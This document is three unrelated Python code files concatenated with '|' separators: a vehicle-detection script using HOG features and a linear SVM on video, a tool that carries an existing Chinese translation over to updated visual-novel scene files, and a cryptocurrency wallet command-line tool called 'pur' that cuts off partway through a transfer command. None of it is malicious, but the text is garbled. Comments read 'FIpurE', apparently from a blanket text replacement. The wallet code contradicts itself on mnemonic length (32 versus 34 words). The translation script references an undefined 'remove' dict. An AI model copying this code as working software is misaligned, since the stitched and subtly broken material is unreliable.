spatial_feat = True # Spatial features on or off
hist_feat = True # Histogram features on or off
hog_feat = True # HOG features on or off
y_start_stop = [400, 720] # Min and max in y to search in slide_window()
x_start_stop = [400, 1280]
car_features = extract_features(cars, color_space=color_space,
spatial_size=spatial_size, hist_bins=hist_bins,
orient=orient, pix_per_cell=pix_per_cell,
cell_per_block=cell_per_block,
hog_channel=hog_channel, spatial_feat=spatial_feat,
hist_feat=hist_feat, hog_feat=hog_feat)
noncar_features = extract_features(notcars, color_space=color_space,
spatial_size=spatial_size, hist_bins=hist_bins,
orient=orient, pix_per_cell=pix_per_cell,
cell_per_block=cell_per_block,
hog_channel=hog_channel, spatial_feat=spatial_feat,
hist_feat=hist_feat, hog_feat=hog_feat)
# create an array stack of feature vectors
X = np.vstack((car_features, noncar_features)).astype(np.float64)
# Define the labels vector
Y = np.hstack((np.ones(len(car_features)), np.zeros(len(noncar_features))))
# split up data into randomized training and test sets
rand_state = np.random.randint(0, 100)
X_train, X_test, Y_train, Y_test = train_test_split(
X, Y, test_size=0.2, random_state=rand_state)
# Fit a per-column scaler
X_scaler = StandardScaler().fit(X_train)
# Apply the scaler to X
X_train = X_scaler.transform(X_train)
X_test = X_scaler.transform(X_test)
print('Using:',orient,'orientations',pix_per_cell,
'pixels per cell and', cell_per_block,'cells per block')
print('Feature vector length:', len(X_train[0]))
# Use a linear SVC
svc = LinearSVC()
# check SVC training time
t=time.time()
svc.fit(X_train, Y_train)
t2 = time.time()
print(round(t2-t, 2), 'Seconds to train SVC...')
# Check the score of the SVC
print('Test Accuracy of SVC = ', round(svc.score(X_test, Y_test), 4))
# Check the prediction time for a single sample
t=time.time()
image = mpimg.imread('test_images/test4.jpg')
draw_image = np.copy(image)
img = image
heat_img = image
# Uncomment the following line if you extracted training
# data from .png images (scaled 0 to 1 by mpimg) and the
# image you are searching is a .jpg (scaled 0 to 255)
image = image.astype(np.float32)/255
windows = slide_window(image, x_start_stop=x_start_stop, y_start_stop=y_start_stop,
xy_window=(96, 96), xy_overlap=(0.5, 0.5))
hot_windows = search_windows(image, windows, svc, X_scaler, color_space=color_space,
spatial_size=spatial_size, hist_bins=hist_bins,
orient=orient, pix_per_cell=pix_per_cell,
cell_per_block=cell_per_block,
hog_channel=hog_channel, spatial_feat=spatial_feat,
hist_feat=hist_feat, hog_feat=hog_feat)
window_img = draw_boxes(draw_image, hot_windows, color=(0, 0, 255), thick=6)
plt.imshow(window_img)
ystart = 400
ystop = 656
scale = 1.5
out_img, bboxes = detect_cars(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block,
spatial_size, hist_bins)
print("show 1")
plt.show()
#plt.imshow(out_img)
image = out_img
box_list = bboxes
heat = np.zeros_like(image[:,:,0]).astype(np.float)
# Add heat to each box in box list
heat = add_heat(heat, box_list)
# Apply threshold to help remove false positives
heat = apply_threshold(heat, 1)
# Visualize the heatmap when displaying
heatmap = np.clip(heat, 0, 255)
# Find final boxes from heatmap using label function
labels = label(heatmap)
draw_img = draw_labeled_bboxes(np.copy(heat_img), labels)
fig = plt.figure()
plt.subplot(121)
plt.imshow(draw_img)
plt.title('Car Positions')
plt.subplot(122)
plt.imshow(heatmap, cmap='hot')
plt.title('Heat Map')
plt.show()
fig.tight_layout()
heatmaps = collections.deque(maxlen=30)
def pipeline(image):
global heats
img = image
heat = np.zeros_like(image[:, :, 0]).astype(np.float)
out_img, bboxes = detect_cars(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block,
spatial_size, hist_bins)
box_list = bboxes
heat = add_heat(heat, box_list)
heatmaps.append(heat)
heatmap_sum = sum(heatmaps)
# Apply threshold to help remove false positives
heat = apply_threshold(heatmap_sum, 1)
# Visualize the heatmap when displaying
heatmap = np.clip(heat, 0, 255)
# Find final boxes from heatmap using label function
labels = label(heatmap_sum)
draw_img = draw_labeled_bboxes(np.copy(image), labels)
return draw_img
video = VideoFileClip("project_video.mp4")
clip = video.fl_image(pipeline) #NOTE: this function expects color images!!
output = "output.mp4"
clip.write_videofile(output, audio=False)
|
import os
import pickle, shutil
from ssmanager import SSManager
from gameexe import Gameexe
oPath = r"E:\hackbase\ss_rwn\scene_orig"
cPath = r"E:\hackbase\ss_rwn\scene_chs"
nPath = r"E:\hackbase\ss\scene"
poPath = r"D:\Desktop\scene_call"
outPath = r"D:\Desktop\scene_out"
gexePath = r"E:\hackbase\ss\Gameexe.ini"
gexe = Gameexe()
gexe.load(open(gexePath, "rb").read().decode("utf-16").split("\n"))
sceneDict = {}
outputContextRadius = 6
matchContextRadius = 4
try:
shutil.rmtree(poPath)
shutil.rmtree(outPath)
except:
pass
os.makedirs(poPath)
os.makedirs(outPath)
def matchContext(l, i, dummyIndex, processor, radius):
above, below = processor[:2]
nAb, nBl = getContext(l, i, dummyIndex, radius)
return nAb == above and nBl == below
def getContext(l, i, dummyIndex, radius):
return l[max(0, i - matchContextRadius):i], l[i + 1:min(i + matchContextRadius + 1, dummyIndex)]
def allAscii(s):
return all(ord(c) < 128 for c in s)
def bytecmp(a, b):
f1 = open(a, "rb").read()
f2 = open(b, "rb").read()
return f1 != f2
for p, d, f in os.walk(oPath):
for fn in f:
path = os.path.join(p, fn)
fInfo = {}
fSize = os.stat(path).st_size
basename, ext = os.path.splitext(fn)
if(ext != ".ss"):
continue
if(not basename in sceneDict):
entry = {}
sceneDict[basename] = entry
else:
entry = sceneDict[basename]
entry["o"] = {"path": path, "size": fSize}
for p, d, f in os.walk(cPath):
for fn in f:
path = os.path.join(p, fn)
fInfo = {}
fSize = os.stat(path).st_size
basename, ext = os.path.splitext(fn)
if(ext != ".ss"):
continue
if(not basename in sceneDict):
entry = {}
sceneDict[basename] = entry
else:
entry = sceneDict[basename]
entry["c"] = {"path": path, "size": fSize}
for p, d, f in os.walk(nPath):
for fn in f:
path = os.path.join(p, fn)
fInfo = {}
fSize = os.stat(path).st_size
basename, ext = os.path.splitext(fn)
if(ext != ".ss"):
continue
if(not basename in sceneDict):
entry = {}
sceneDict[basename] = entry
else:
entry = sceneDict[basename]
entry["n"] = {"path": path, "size": fSize}
diff = {}
same = {}
rm = {}
new = {}
for i, (basename, entry) in enumerate(sceneDict.items()):
oHas = "o" in entry
cHas = "c" in entry
nHas = "n" in entry
if(oHas and not nHas):
remove[basename] = entry
continue
if(nHas and not oHas):
new[basename] = entry
continue
isDiff = entry["o"]["size"] != entry["n"]["size"]
if(not isDiff):
isDiff = bytecmp(entry["o"]["path"], entry["n"]["path"])
if(isDiff):
diff[basename] = entry
continue
same[basename] = entry
# string match
untranslatedDict = {}
for iEntry, (basename, entry) in enumerate(diff.items()):
print(iEntry ,"/", len(diff))
# load and check datas
orig = SSManager()
chs = SSManager()
plus = SSManager()
orig.load(open(entry["o"]["path"], "rb").read())
chs.load(open(entry["c"]["path"], "rb").read())
plus.load(open(entry["n"]["path"], "rb").read())
origDummyIndex = orig.stringList.index("dummy")
chsDummyIndex = chs.stringList.index("dummy")
plusDummyIndex = plus.stringList.index("dummy")
assert(origDummyIndex == chsDummyIndex)
assert(origDummyIndex != -1)
assert(plusDummyIndex != -1)
if(origDummyIndex < len(orig.stringList) - 1):
assert(all(allAscii(x) for x in orig.stringList[origDummyIndex:]))
assert(all(allAscii(x) for x in chs.stringList[chsDummyIndex:]))
assert(all(allAscii(x) for x in plus.stringList[plusDummyIndex:]))
# collect confliction
sentenceDict = {}
conflictDict = {}
tempDict = {}
for i, origSentence in enumerate(orig.stringList[:origDummyIndex]):
if(not origSentence or origSentence in gexe.namae):
continue
translatedStr = chs.stringList[i]
inDict = tempDict.get(origSentence, None)
if(inDict is None):
inDict = []
tempDict[origSentence] = inDict
inDict.append(translatedStr)
tempDict = {k: len(set(v)) for k, v in tempDict.items()}
for i, origSentence in enumerate(orig.stringList[:origDummyIndex]):
if(not origSentence or origSentence in gexe.namae):
continue
translatedStr = chs.stringList[i]
if(tempDict[origSentence] > 1):
ctx = (*getContext(orig.stringList, i, origDummyIndex, matchContextRadius), translatedStr)
processList = conflictDict.get(origSentence, None)
if(processList is None):
processList = []
conflictDict[origSentence] = processList
processList.append(ctx)
del tempDict
# build sentenceDict
for i, origSentence in enumerate(orig.stringList[:origDummyIndex]):
if(not origSentence or origSentence in gexe.namae):
continue
if(not origSentence in conflictDict):
sentenceDict[origSentence] = chs.stringList[i]
# translate plus
nMiss = 0
nHit = 0
untranslatedPlusStringList = list(plus.stringList)
for i, plusSentence in enumerate(plus.stringList[:plusDummyIndex]):
if(not plusSentence or plusSentence in gexe.namae):
continue
conflictProcessorList = conflictDict.get(plusSentence, None)
hit = False
if(conflictProcessorList is not None):
for processor in conflictProcessorList:
if(matchContext(untranslatedPlusStringList, i, plusDummyIndex, processor, matchContextRadius)):
plus.stringList[i] = processor[2]
hit = True
else:
translatedStr = sentenceDict.get(plusSentence, None)
if(translatedStr is not None):
plus.stringList[i] = translatedStr
hit = True
if(not hit):
nMiss += 1
ctxUntranslated = getContext(untranslatedPlusStringList, i, plusDummyIndex, outputContextRadius)
ctxTranslated = getContext(plus.stringList, i, plusDummyIndex, outputContextRadius)
l = untranslatedDict.get(plusSentence, None)
if(l is None):
l = []
untranslatedDict[plusSentence] = l
l.append((ctxUntranslated, ctxTranslated))
else:
nHit += 1
if(nMiss):
pickle.dump(untranslatedDict, open(os.path.join(poPath, "%s.pickle" % (basename,)), "wb"))
print("Missed %d / %d" % (nMiss, nMiss + nHit))
open(os.path.join(outPath, "%s.ss" % (basename,)), "wb").write(plus.dump())
print("Total:", len(sceneDict))
print("Same:", len(same))
print("Removed:", len(rm))
print("New:", len(new))
print(" %s" % (str(list(new.keys()))))
|
#!/usr/bin/env python3
import os
from binascii import hexlify, a2b_base64
from collections import namedtuple
from decimal import Decimal
from typing import List
import click
import grpc
import simplejson as json
from google.protobuf.json_format import MessageToJson
from pypurlib.pypurlib import mnemonic2bin, hstr2bin, bin2hstr
from pur.core import config
from pur.core.Wallet import Wallet, WalletDecryptionError
from pur.core.misc.helper import parse_hexblob, parse_qaddress
from pur.core.MultiSigAddressState import MultiSigAddressState
from pur.core.txs.MessageTransaction import MessageTransaction
from pur.core.txs.SlaveTransaction import SlaveTransaction
from pur.core.txs.TokenTransaction import TokenTransaction
from pur.core.txs.Transaction import Transaction
from pur.core.txs.TransferTokenTransaction import TransferTokenTransaction
from pur.core.txs.TransferTransaction import TransferTransaction
from pur.core.txs.multisig.MultiSigCreate import MultiSigCreate
from pur.core.txs.multisig.MultiSigSpend import MultiSigSpend
from pur.crypto.purss import purSS, hash_functions
from pur.generated import pur_pb2_grpc, pur_pb2
ENV_pur_WALLET_DIR = 'ENV_pur_WALLET_DIR'
OutputMessage = namedtuple('OutputMessage', 'error address_items balance_items')
BalanceItem = namedtuple('BalanceItem', 'address balance')
CONNECTION_TIMEOUT = 5
class CLIContext(object):
def __init__(self, verbose, host, port_public, wallet_dir, output_json):
self.verbose = verbose
self.host = host
self.port_public = port_public
self.wallet_dir = os.path.abspath(wallet_dir)
self.wallet_path = os.path.join(self.wallet_dir, 'wallet.json')
self.output_json = output_json
def get_stub_public_api(self):
node_public_address = '{}:{}'.format(self.host, self.port_public)
channel = grpc.insecure_channel(node_public_address)
return pur_pb2_grpc.PublicAPIStub(channel)
def _print_error(ctx, error_descr, wallets=None):
# FIpurE: Dead function
if ctx.obj.output_json:
if wallets is None:
wallets = []
msg = {'error': error_descr, 'wallets': wallets}
click.echo(json.dumps(msg))
else:
print("ERROR: {}".format(error_descr))
def _serialize_output(ctx, addresses: List[OutputMessage], source_description) -> dict:
if len(addresses) == 0:
msg = {'error': 'No wallet found at {}'.format(source_description), 'wallets': []}
return msg
msg = {'error': None, 'wallets': []}
for pos, item in enumerate(addresses):
try:
balance_unshored = Decimal(_public_get_address_balance(ctx, item.qaddress)) / config.dev.shor_per_quanta
balance = '{:5.8f}'.format(balance_unshored)
except Exception as e:
msg['error'] = str(e)
balance = '?'
msg['wallets'].append({
'number': pos,
'address': item.qaddress,
'balance': balance,
'hash_function': item.hashFunction
})
return msg
def validate_ots_index(ots_key_index, src_purss, prompt=True):
while not (0 <= ots_key_index < src_purss.number_signatures):
if prompt:
ots_key_index = click.prompt('OTS key Index [{}..{}]'.format(0, src_purss.number_signatures - 1), type=int)
prompt = False
else:
click.echo("OTS key index must be between {} and {} (inclusive)".format(0, src_purss.number_signatures - 1))
quit(1)
return ots_key_index
def get_item_from_wallet(wallet, wallet_idx):
if 0 <= wallet_idx < len(wallet.address_items):
return wallet.address_items[wallet_idx]
click.echo('Wallet index not found {}'.format(wallet_idx), color='yellow')
return None
def _print_addresses(ctx, addresses: List[OutputMessage], source_description):
def _normal(wallet):
return "{:<8}{:<83}{:<13}".format(wallet['number'], wallet['address'], wallet['balance'])
def _verbose(wallet):
return "{:<8}{:<83}{:<13}{}".format(
wallet['number'], wallet['address'], wallet['balance'], wallet['hash_function']
)
output = _serialize_output(ctx, addresses, source_description)
if ctx.obj.output_json:
output["location"] = source_description
click.echo(json.dumps(output))
else:
if output['error'] and output['wallets'] == []:
click.echo(output['error'])
else:
click.echo("Wallet at : {}".format(source_description))
if ctx.obj.verbose:
header = "{:<8}{:<83}{:<13}{:<8}".format('Number', 'Address', 'Balance', 'Hash')
divider = ('-' * 112)
else:
header = "{:<8}{:<83}{:<13}".format('Number', 'Address', 'Balance')
divider = ('-' * 101)
click.echo(header)
click.echo(divider)
for wallet in output['wallets']:
if ctx.obj.verbose:
click.echo(_verbose(wallet))
else:
click.echo(_normal(wallet))
def _public_get_address_balance(ctx, address):
stub = ctx.obj.get_stub_public_api()
get_address_state_req = pur_pb2.GetAddressStateReq(address=parse_qaddress(address))
get_optimized_address_state_resp = stub.GetOptimizedAddressState(get_address_state_req, timeout=CONNECTION_TIMEOUT)
return get_optimized_address_state_resp.state.balance
def _select_wallet(ctx, address_or_index):
try:
wallet = Wallet(wallet_path=ctx.obj.wallet_path)
if not wallet.addresses:
click.echo('This command requires a local wallet')
return
if wallet.encrypted:
secret = click.prompt('The wallet is encrypted. Enter password', hide_input=True)
wallet.decrypt(secret)
if address_or_index.isdigit():
address_or_index = int(address_or_index)
addr_item = get_item_from_wallet(wallet, address_or_index)
if addr_item:
# FIpurE: This should only return pk and index
purss = wallet.get_purss_by_index(address_or_index)
return wallet.addresses[address_or_index], purss
elif address_or_index.startswith('Q'):
for i, addr_item in enumerate(wallet.address_items):
if address_or_index == addr_item.qaddress:
purss = wallet.get_purss_by_address(wallet.addresses[i])
return wallet.addresses[i], purss
click.echo('Source address not found in your wallet', color='yellow')
quit(1)
return parse_qaddress(address_or_index), None
except Exception as e:
click.echo("Error selecting wallet")
click.echo(str(e))
quit(1)
def _quanta_to_shor(x: Decimal, base=Decimal(config.dev.shor_per_quanta)) -> int:
return int(Decimal(x * base).to_integral_value())
def _parse_dsts_amounts(addresses: str, amounts: str, token_decimals: int = 0, check_multi_sig_address=False):
"""
'Qaddr1 Qaddr2...' -> [\\xcx3\\xc2, \\xc2d\\xc3]
'10 10' -> [10e9, 10e9] (in shor)
:param addresses:
:param amounts:
:return:
"""
addresses_split = [parse_qaddress(addr, check_multi_sig_address) for addr in addresses.split(' ')]
if token_decimals != 0:
multiplier = Decimal(10 ** int(token_decimals))
shor_amounts = [_quanta_to_shor(Decimal(amount), base=multiplier) for amount in amounts.split(' ')]
else:
shor_amounts = [_quanta_to_shor(Decimal(amount)) for amount in amounts.split(' ')]
if len(addresses_split) != len(shor_amounts):
raise Exception("dsts and amounts should be the same length")
return addresses_split, shor_amounts
########################
########################
########################
########################
@click.version_option(version=config.dev.version, prog_name='pur Command Line Interface')
@click.group()
@click.option('--verbose', '-v', default=False, is_flag=True, help='verbose output whenever possible')
@click.option('--host', default='127.0.0.1', help='remote host address [127.0.0.1]')
@click.option('--port_pub', default=19009, help='remote port number (public api) [19009]')
@click.option('--wallet_dir', default='.', help='local wallet dir', envvar=ENV_pur_WALLET_DIR)
@click.option('--json', default=False, is_flag=True, help='output in json')
@click.pass_context
def pur(ctx, verbose, host, port_pub, wallet_dir, json):
"""
pur Command Line Interface
"""
ctx.obj = CLIContext(verbose=verbose,
host=host,
port_public=port_pub,
wallet_dir=wallet_dir,
output_json=json)
@pur.command()
@click.pass_context
def wallet_ls(ctx):
"""
Lists available wallets
"""
wallet = Wallet(wallet_path=ctx.obj.wallet_path)
_print_addresses(ctx, wallet.address_items, ctx.obj.wallet_dir)
@pur.command()
@click.pass_context
@click.option('--height', default=config.dev.purss_tree_height,
help='purSS tree height. The resulting tree will be good for 2^height signatures')
@click.option('--hash_function', type=click.Choice(list(hash_functions.keys())), default='shake128',
help='Hash function used to build the purSS tree [default=shake128]')
@click.option('--encrypt', default=False, is_flag=True, help='Encrypts important fields with AES')
def wallet_gen(ctx, height, hash_function, encrypt):
"""
Generates a new wallet with one address
"""
wallet = Wallet(wallet_path=ctx.obj.wallet_path)
if len(wallet.address_items) > 0:
click.echo("Wallet already exists")
return
wallet.add_new_address(height, hash_function)
_print_addresses(ctx, wallet.address_items, ctx.obj.wallet_path)
if encrypt:
secret = click.prompt('Enter password to encrypt wallet with', hide_input=True, confirmation_prompt=True)
wallet.encrypt(secret)
wallet.save()
@pur.command()
@click.option('--height', type=int, default=config.dev.purss_tree_height, prompt=False)
@click.option('--hash_function', type=click.Choice(list(hash_functions.keys())), default='shake128',
help='Hash function used to build the purSS tree [default=shake128]')
@click.pass_context
def wallet_add(ctx, height, hash_function):
"""
Adds an address or generates a new wallet (working directory)
"""
secret = None
wallet = Wallet(wallet_path=ctx.obj.wallet_path)
wallet_was_encrypted = wallet.encrypted
if wallet.encrypted:
secret = click.prompt('The wallet is encrypted. Enter password', hide_input=True)
wallet.decrypt(secret)
wallet.add_new_address(height, hash_function)
_print_addresses(ctx, wallet.address_items, config.user.wallet_dir)
if wallet_was_encrypted:
wallet.encrypt(secret)
wallet.save()
@pur.command()
@click.option('--seed-type', type=click.Choice(['hexseed', 'mnemonic']), default='hexseed')
@click.pass_context
def wallet_recover(ctx, seed_type):
"""
Recovers a wallet from a hexseed or mnemonic (32 words)
"""
seed = click.prompt('Please enter your %s' % (seed_type,))
seed = seed.lower().strip()
if seed_type == 'mnemonic':
words = seed.split()
if len(words) != 34:
print('You have entered %s words' % (len(words),))
print('Mnemonic seed must contain only 34 words')
return
bin_seed = mnemonic2bin(seed)
else:
if len(seed) != 102:
print('You have entered hexseed of %s characters' % (len(seed),))
print('Hexseed must be of only 102 characters.')
return
bin_seed = hstr2bin(seed)
wallet = Wallet(wallet_path=ctx.obj.wallet_path)
recovered_purss = purSS.from_extended_seed(bin_seed)
print('Recovered Wallet Address : %s' % (Wallet._get_Qaddress(recovered_purss.address),))
for addr in wallet.address_items:
if recovered_purss.qaddress == addr.qaddress:
print('Wallet Address is already in the wallet list')
return
if click.confirm('Do you want to save the recovered wallet?'):
click.echo('Saving...')
wallet.append_purss(recovered_purss)
wallet.save()
click.echo('Done')
_print_addresses(ctx, wallet.address_items, config.user.wallet_dir)
@pur.command()
@click.option('--wallet-idx', default=1, prompt=True)
@click.pass_context
def wallet_secret(ctx, wallet_idx):
"""
Provides the mnemonic/hexseed of the given address index
"""
wallet = Wallet(wallet_path=ctx.obj.wallet_path)
if wallet.encrypted:
secret = click.prompt('The wallet is encrypted. Enter password', hide_input=True)
wallet.decrypt(secret)
address_item = get_item_from_wallet(wallet, wallet_idx)
if address_item:
click.echo('Wallet Address : {}'.format(address_item.qaddress))
click.echo('Mnemonic : {}'.format(address_item.mnemonic))
click.echo('Hexseed : {}'.format(address_item.hexseed))
@pur.command()
@click.option('--wallet-idx', type=int, prompt=True, help='index of address in wallet')
@click.option('--skip-confirmation', default=False, is_flag=True, prompt=False, help='skip the confirmation prompt')
@click.pass_context
def wallet_rm(ctx, wallet_idx, skip_confirmation):
"""
Removes an address from the wallet using the given address index.
Warning! Use with caution. Removing an address from the wallet
will result in loss of access to the address and is not
reversible unless you have address recovery information.
Use the wallet_secret command for obtaining the recovery Mnemonic/Hexseed and
the wallet_recover command for restoring an address.
"""
wallet = Wallet(wallet_path=ctx.obj.wallet_path)
address_item = get_item_from_wallet(wallet, wallet_idx)
if address_item:
if not skip_confirmation:
click.echo(
'You are about to remove address [{0}]: {1} from the wallet.'.format(wallet_idx, address_item.qaddress))
click.echo(
'Warning! By continuing, you risk complete loss of access to this address if you do not have a '
'recovery Mnemonic/Hexseed.')
click.confirm('Do you want to continue?', abort=True)
wallet.remove(address_item.qaddress)
_print_addresses(ctx, wallet.address_items, config.user.wallet_dir)
@pur.command()
@click.pass_context
def wallet_encrypt(ctx):
wallet = Wallet(wallet_path=ctx.obj.wallet_path)
click.echo('Encrypting wallet at {}'.format(wallet.wallet_path))
secret = click.prompt('Enter password', hide_input=True, confirmation_prompt=True)
wallet.encrypt(secret)
wallet.save()
@pur.command()
@click.pass_context
def wallet_decrypt(ctx):
wallet = Wallet(wallet_path=ctx.obj.wallet_path)
click.echo('Decrypting wallet at {}'.format(wallet.wallet_path))
secret = click.prompt('Enter password', hide_input=True)
try:
wallet.decrypt(secret)
except WalletDecryptionError as e:
click.echo(str(e))
quit(1)
except Exception as e:
click.echo(str(e))
quit(1)
try:
wallet.save()
except Exception as e:
click.echo(str(e))
quit(1)
@pur.command()
@click.option('--txblob', type=str, default='', prompt=True, help='transaction blob')
@click.pass_context
def tx_inspect(ctx, txblob):
"""
Inspected a transaction blob
"""
tx = None
try:
txbin = parse_hexblob(txblob)
pbdata = pur_pb2.Transaction()
pbdata.ParseFromString(txbin)
tx = Transaction.from_pbdata(pbdata)
except Exception as e:
click.echo("tx blob is not valid")
quit(1)
tmp_json = tx.to_json()
# FIpurE: binary fields are represented in base64. Improve output
print(tmp_json)
@pur.command()
@click.option('--txblob', type=str, default='', help='transaction blob (unsigned)')
@click.pass_context
def tx_push(ctx, txblob):
"""
Sends a signed transaction blob to a node
"""
tx = None
try:
txbin = parse_hexblob(txblob)
pbdata = pur_pb2.Transaction()
pbdata.ParseFromString(txbin)
tx = Transaction.from_pbdata(pbdata)
except Exception as e:
click.echo("tx blob is not valid")
quit(1)
tmp_json = tx.to_json()
# FIpurE: binary fields are represented in base64. Improve output
print(tmp_json)
if len(tx.signature) == 0:
click.echo('Signature missing')
quit(1)
stub = ctx.obj.get_stub_public_api()
pushTransactionReq = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
pushTransactionResp = stub.PushTransaction(pushTransactionReq, timeout=CONNECTION_TIMEOUT)
print(pushTransactionResp.error_code)
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='signer pur address')
@click.option('--master', type=str, default='', prompt=True, help='master pur address')
@click.option('--addr_to', type=str, default='', prompt=True, help='pur Address receiving this message (optional)')
@click.option('--message', type=str, prompt=True, help='Message (max 80 bytes)')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, prompt=True, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_message(ctx, src, master, addr_to, message, fee, ots_key_index):
"""
Message Transaction
"""
try:
_, src_purss = _select_wallet(ctx, src)
if not src_purss:
click.echo("A local wallet is required to sign the transaction")
quit(1)
address_src_pk = src_purss.pk
ots_key_index = validate_ots_index(ots_key_index, src_purss)
src_purss.set_ots_index(ots_key_index)
message = message.encode()
addr_to = parse_qaddress(addr_to, False)
master_addr = None
if master:
master_addr = parse_qaddress(master)
fee_shor = _quanta_to_shor(fee)
except Exception as e:
click.echo("Error validating arguments: {}".format(e))
quit(1)
try:
stub = ctx.obj.get_stub_public_api()
tx = MessageTransaction.create(message_hash=message,
addr_to=addr_to,
fee=fee_shor,
purss_pk=address_src_pk,
master_addr=master_addr)
tx.sign(src_purss)
push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
print(push_transaction_resp)
except Exception as e:
print("Error {}".format(str(e)))
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='source pur address')
@click.option('--master', type=str, default='', prompt=True, help='master pur address')
@click.option('--threshold', default=0, prompt=True, help='Threshold')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, prompt=True, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_multi_sig_create(ctx, src, master, threshold, fee, ots_key_index):
"""
Creates Multi Sig Create Transaction, that results into the formation of new multi_sig_address if accepted.
"""
signatories = []
weights = []
while True:
address = click.prompt('Address of Signatory ', default='')
if address == '':
break
weight = int(click.prompt('Weight '))
signatories.append(parse_qaddress(address))
weights.append(weight)
try:
_, src_purss = _select_wallet(ctx, src)
if not src_purss:
click.echo("A local wallet is required to sign the transaction")
quit(1)
address_src_pk = src_purss.pk
ots_key_index = validate_ots_index(ots_key_index, src_purss)
src_purss.set_ots_index(ots_key_index)
master_addr = None
if master:
master_addr = parse_qaddress(master)
# FIpurE: This could be problematic. Check
fee_shor = _quanta_to_shor(fee)
except KeyboardInterrupt:
click.echo("Terminated by user")
quit(1)
except Exception as e:
click.echo("Error validating arguments: {}".format(e))
quit(1)
try:
stub = ctx.obj.get_stub_public_api()
tx = MultiSigCreate.create(signatories=signatories,
weights=weights,
threshold=threshold,
fee=fee_shor,
purss_pk=address_src_pk,
master_addr=master_addr)
tx.sign(src_purss)
push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
print(push_transaction_resp.error_code)
print('Multi sig Address Q{}'.format(bin2hstr(MultiSigAddressState.generate_multi_sig_address(tx.txhash))))
except Exception as e:
print("Error {}".format(str(e)))
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='signer pur address')
@click.option('--master', type=str, default='', help='master pur address')
@click.option('--multi_sig_address', type=str, default='', prompt=True, help='signer Multi Sig Address')
@click.option('--dsts', type=str, prompt=True, help='List of destination addresses')
@click.option('--amounts', type=str, prompt=True, help='List of amounts to transfer (Quanta)')
@click.option('--expiry_block_number', type=int, prompt=True, help='Expiry Blocknumber')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_multi_sig_spend(ctx, src, master, multi_sig_address, dsts, amounts, expiry_block_number, fee, ots_key_index):
"""
Transfer coins from src to dsts
"""
address_src_pk = None
master_addr = None
addresses_dst = []
shor_amounts = []
fee_shor = []
signing_object = None
try:
# Retrieve signing object
selected_wallet = _select_wallet(ctx, src)
if selected_wallet is None or len(selected_wallet) != 2:
click.echo("A wallet was not found")
quit(1)
_, src_purss = selected_wallet
if not src_purss:
click.echo("A local wallet is required to sign the transaction")
quit(1)
address_src_pk = src_purss.pk
ots_key_index = validate_ots_index(ots_key_index, src_purss)
src_purss.set_ots_index(ots_key_index)
signing_object = src_purss
# Get and validate other inputs
if master:
master_addr = parse_qaddress(master)
addresses_dst, shor_amounts = _parse_dsts_amounts(dsts, amounts, check_multi_sig_address=True)
fee_shor = _quanta_to_shor(fee)
except Exception as e:
click.echo("Error validating arguments: {}".format(e))
quit(1)
multi_sig_address = bytes(hstr2bin(multi_sig_address[1:]))
try:
# MultiSigSpend transaction
tx = MultiSigSpend.create(multi_sig_address=multi_sig_address,
addrs_to=addresses_dst,
amounts=shor_amounts,
expiry_block_number=expiry_block_number,
fee=fee_shor,
purss_pk=address_src_pk,
master_addr=master_addr)
# Sign transaction
tx.sign(signing_object)
if not tx.validate():
print("It was not possible to validate the signature")
quit(1)
print("\nTransaction Blob (signed): \n")
txblob = tx.pbdata.SerializeToString()
txblobhex = hexlify(txblob).decode()
print(txblobhex)
# Push transaction
print()
print("Sending to a pur Node...")
stub = ctx.obj.get_stub_public_api()
push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
# Print result
print(push_transaction_resp)
except Exception as e:
print("Error {}".format(str(e)))
def base64tohex(data):
return hexlify(a2b_base64(data))
def tx_unbase64(tx_json_str):
tx_json = json.loads(tx_json_str)
tx_json["publicKey"] = base64tohex(tx_json["publicKey"])
tx_json["signature"] = base64tohex(tx_json["signature"])
tx_json["transactionHash"] = base64tohex(tx_json["transactionHash"])
tx_json["transfer"]["addrsTo"] = [base64tohex(v) for v in tx_json["transfer"]["addrsTo"]]
return json.dumps(tx_json, indent=True, sort_keys=True)
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='signer pur address')
@click.option('--master', type=str, default='', help='master pur address')
@click.option('--dsts', type=str, prompt=True, help='List of destination addresses')
@click.option('--amounts', type=str, prompt=True, help='List of amounts to transfer (Quanta)')
@click.option('--message_data', type=str, prompt=True, help='Message (Optional)')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_transfer(ctx, src, master, dsts, amounts, message_data, fee, ots_key_index):
"""
Transfer coins from src to dsts
"""
address_src_pk = None
master_addr = None
addresses_dst = []
shor_amounts = []
fee_shor = []
signing_object = None
message_data = message_data.encode()
try:
# Retrieve signing object
selected_wallet = _select_wallet(ctx, src)
if selected_wallet is None or len(selected_wallet) != 2:
click.echo("A wallet was not found")
quit(1)
_, src_purss = selected_wallet
if not src_purss:
click.echo("A local wallet is required to sign the transaction")
quit(1)
address_src_pk = src_purss.pk
ots_key_index = validate_ots_index(ots_key_index, src_purss)
src_purss.set_ots_index(ots_key_index)
signing_object = src_purss
# Get and validate other inputs
if master:
master_addr = parse_qaddress(master)
